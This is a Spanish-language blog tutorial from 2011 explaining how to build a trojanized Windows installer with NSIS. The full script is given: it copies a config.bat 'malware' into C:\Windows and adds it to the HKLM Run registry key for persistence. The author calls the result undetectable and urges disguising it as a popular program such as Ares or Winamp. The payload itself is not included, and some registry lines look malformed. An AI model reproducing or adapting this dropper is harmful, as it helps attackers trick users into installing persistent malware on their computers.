RSS FEED

1 sept 2011

[Tutorial]Malware oculto en rutina de instalación




Cuantas veces, instalamos programas sin hacer ni caso a los posibles virus que puedan contener, pues aprovechandome de eso, he creado un instalador que en vez de instalar un programa, te infecta un pequeño script malicioso( este se puede cambiar por un virus programado en otro lenguaje y por tanto más potente). Así que lo primero que hice fue bajarme el NSIS (Nullsoft Scriptable Install System)



Explico, NSIS es una herramienta de código abierto, que permite mediante scripts, crear instaladores típicos que se suelen usar en Windows.

<a href="http://imageshack.us/photo/my-images/231/nsisscreenshot5.png/" target="_blank"><img src="" border="0"/></a>

Al final me quedó un código de este tipo:

;NSIS Modern User Interface
;Basic Example Script - Se encuentra aquí: C:\Program Files\NSIS\Examples\Modern UI

;Lo tenemos que compilar desde la carpeta: C:\Program Files\NSIS\Examples\Modern UI
;--------------------------------
;Include Modern UI
  !include "MUI2.nsh"
;--------------------------------
;General
  ;Name and file
  Name "Installer"
  OutFile "Basic.exe"
  ;Default installation folder - Donde instalamos nuestro malware
  InstallDir "C:\Windows"

  ;Get installation folder from registry if available
  InstallDirRegKey HKLM "Software\Microsoft\Windows\CurrentVersion\Run\" "C:\Windows\config.bat"
  ;Request application privileges for Windows Vista
  RequestExecutionLevel user
;--------------------------------
;Interface Settings
  !define MUI_ABORTWARNING
;--------------------------------
;Pages
;Creamos una licencia que la pondremos junto a Basic.EXE que es el instalador
  !insertmacro MUI_PAGE_LICENSE "license.txt"
  !insertmacro MUI_PAGE_COMPONENTS
  !insertmacro MUI_PAGE_DIRECTORY
  !insertmacro MUI_PAGE_INSTFILES

  !insertmacro MUI_UNPAGE_CONFIRM
  !insertmacro MUI_UNPAGE_INSTFILES

;--------------------------------
;Languages

  !insertmacro MUI_LANGUAGE "Spanish"
Name "Example Program"
Caption "Darkc0de installer para Win32 Setup"
;--------------------------------
;Installer Sections
Section "Menu1" Sec1
  SetOutPath "$INSTDIR"

  ;ADD YOUR OWN FILES HERE...
  File config.bat
;Acabo de escribir la orden que hara que se extraiga nuestro malware, config.bat, en la ruta de instalación
  ;Store installation folder - O lo que es lo mismo, agregamos al inicio nuestro malware
  WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Run\" $INSTDIR "C:\Windows\config.bat"

  ;Create uninstaller
  WriteUninstaller "$INSTDIR\Uninstall.exe"
SectionEnd
Section "Menu2" Sec2
;Aqui podemos añadir mas
SectionEnd
;--------------------------------
;Descriptions
;Para crear los menus en el instalador
  ;Language strings
  LangString DESC_Sec1 ${LANG_SPANISH} "Primer menu "
LangString DESC_Sec2 ${LANG_SPANISH} "segundo menu "
  ;Assign language strings to sections
  !insertmacro MUI_FUNCTION_DESCRIPTION_BEGIN
    !insertmacro MUI_DESCRIPTION_TEXT ${Sec1} $(DESC_Sec1)
   !insertmacro MUI_DESCRIPTION_TEXT ${Sec2} $(DESC_Sec2)
  !insertmacro MUI_FUNCTION_DESCRIPTION_END
;--------------------------------
;Uninstaller Section - Por si se diera el caso que se desinstala xD
Section "Uninstall"
  ;ADD YOUR OWN FILES HERE...
  Delete "$INSTDIR\Uninstall.exe"
  RMDir "$INSTDIR"
  DeleteRegKey /ifempty HKCU "Software\Example"
SectionEnd

Lo he comentado más de lo que ya estaba, y aún he de aclarar, que para hacerlo correr se compilar desde la carpeta NSIS\Examples\Modern UI y después ya podemos usarlo en cualquier lado.

Yo he hecho esto:



Y con eso ya podemos tener la libertad de crear un malware en BATCH y meterlo en config.bat y ya está añadido al Inicio de Windows. Totalmente indetectable y con la apariencia de un instalador normal.

Ahora queda lo importante, modificarlo, para que parezca de verdad un instalador de un programa normal, como Ares, Winamp, etc...

Cualquier duda sobre el lenguaje Script que utiliza NSIS, o dudas sobre el tutorial en general, preguntad en la entrada.



No hay comentarios:

Publicar un comentario

Arriba